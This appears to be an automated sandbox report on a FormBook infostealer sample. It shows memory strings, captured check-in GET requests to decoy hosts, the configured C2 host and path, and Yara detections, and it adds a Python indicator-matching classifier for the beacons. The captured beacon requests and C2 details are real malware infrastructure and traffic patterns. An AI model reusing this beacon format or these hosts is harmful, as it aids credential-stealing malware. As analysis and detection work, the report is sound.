Source: Fu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmS
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp; Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/)
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp//lpk
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/7
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/D
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ro
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ch
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/D
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/k
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ms
Source: Fu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/nly
Source: Fu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/nt
Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/v
Source: Fu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.coma-e
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.de
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deMT
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmp, String found in binary or memory: https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34I
Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmp, String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_land
Source: unknown, DNS traffic detected: queries for: www.apricitee.com
Source: global traffic, HTTP traffic detected:
  GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1
  Host: www.apricitee.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic, HTTP traffic detected:
  GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1
  Host: www.shacksolid.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
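The two captured requests and the extracted configuration in the Malware Configuration section belong together: both GETs use the configured path `/ef6c/`, carry no User-Agent, close the connection, and go to hosts that appear in the configuration's "decoy" list rather than to the configured C2 `www.fis.photos`. The following is an added example, not part of the report or of FormBook's own code, showing how to turn that configuration into indicators and classify requests against them. CONFIG reproduces the report's C2 entry and a subset of its 64 decoy domains; REQUESTS holds the two requests copied from the "HTTP traffic detected" lines above, a hypothetical request to the configured C2 host that was not observed in this run, and a constructed benign browser request to a decoy domain for contrast.

```python
"""Indicators from the extracted FormBook configuration, checked against
HTTP requests. Added example; CONFIG is a subset of the report's
configuration, REQUESTS are constructed as described in the lead-in.
"""
import json
import re
from urllib.parse import urlsplit

CONFIG = json.loads('''{"C2 list": ["www.fis.photos/ef6c/"],
 "decoy": ["gicaredocs.com", "shacksolid.com", "apricitee.com",
           "instatechnovelz.com", "brondairy.com", "satellitphonestore.com"]}''')

REQUESTS = {
    # Copied from the two "HTTP traffic detected" entries above (7 NUL bytes of body included).
    "apricitee": ("GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1\r\n"
                  "Host: www.apricitee.com\r\nConnection: close\r\n\r\n" + "\x00" * 7),
    "shacksolid": ("GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1\r\n"
                   "Host: www.shacksolid.com\r\nConnection: close\r\n\r\n" + "\x00" * 7),
    # Hypothetical: the same beacon aimed at the configured C2 host (not observed in the report).
    "c2": ("GET /ef6c/?BJB=7nO80D&yrTlglv8=" + "A" * 48 + " HTTP/1.1\r\n"
           "Host: www.fis.photos\r\nConnection: close\r\n\r\n"),
    # Constructed benign visit to a decoy domain: decoys are ordinary third-party sites.
    "browse": ("GET /index.html HTTP/1.1\r\nHost: www.shacksolid.com\r\n"
               "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"),
}


def canon_host(h):
    h = h.strip().lower().rstrip(".")
    return h[4:] if h.startswith("www.") else h


def indicators(cfg):
    """Hosts and the campaign path that both C2 and decoy traffic share."""
    c2 = [urlsplit("http://" + u) for u in cfg["C2 list"]]
    return {
        "c2_hosts": {canon_host(p.hostname) for p in c2},
        "decoy_hosts": {canon_host(d) for d in cfg["decoy"]},
        "paths": {p.path for p in c2},          # {"/ef6c/"}
    }


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    return dict(method=method, target=target, headers=headers, body=body)


def classify(raw, ioc):
    """Return (verdict, reasons) for one raw HTTP request."""
    r = parse_request(raw)
    host = canon_host(r["headers"].get("host", ""))
    u = urlsplit(r["target"])
    reasons = []
    if host in ioc["c2_hosts"]:
        reasons.append("host is a configured C2")
    elif host in ioc["decoy_hosts"]:
        reasons.append("host is a configured decoy")
    if u.path in ioc["paths"]:
        reasons.append(f"campaign path {u.path}")
    if "user-agent" not in r["headers"]:
        reasons.append("no User-Agent")
    if r["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    # Beacon shape seen above: GET, one short path segment, two params, one long opaque value.
    params = dict(p.split("=", 1) for p in u.query.split("&") if "=" in p)
    if (r["method"] == "GET" and re.fullmatch(r"/[0-9a-z]{2,8}/", u.path)
            and len(params) == 2 and max(len(v) for v in params.values()) >= 40):
        reasons.append("beacon-shaped query")
    config_hit = any(x.startswith(("host is", "campaign path")) for x in reasons)
    if config_hit and "beacon-shaped query" in reasons:
        verdict = "formbook-checkin"
    elif len(reasons) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return verdict, reasons


def report(requests=REQUESTS, cfg=CONFIG):
    ioc = indicators(cfg)
    return {name: classify(raw, ioc) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, (verdict, reasons) in report().items():
        print(f"{name:10s} {verdict:17s} {reasons}")
```

The verdict deliberately requires a configuration hit and the beacon shape together. The decoy list is made of unrelated sites (the sedo.com string found in NETSTAT.EXE memory above shows shacksolid.com is a parked domain), so a domain match on its own is a weak indicator that would page analysts for ordinary browsing; the campaign path plus the header-less two-parameter GET is what separates the check-in from a visit, whichever of the 65 configured hosts it lands on.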

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, file source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: Fu94e0b1TR.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 0_2_00F5D064
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 0_2_00F5F296
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 0_2_00F5F298
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00401030
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041B9DA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041C2B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00408C70
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041BC20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00402D87
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041C58D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00402D90
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041BE92
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00402FB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0118F900
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_01180D20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_01251D55
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0119841F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_01241002
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0119B090
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011BEBB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011A6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D66E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D7EBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D5B090
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D5841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02E01002
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D5D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02E11D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D4F900
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D40D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003DB9DA
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003DC2B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003DBC20
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003C8C70
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003C2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003DC58D
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003C2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003DBE92
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003C2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: String function: 02D4B150 appears 32 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: String function: 0118B150 appears 35 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_004185B0 NtCreateFile
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00418660 NtReadFile
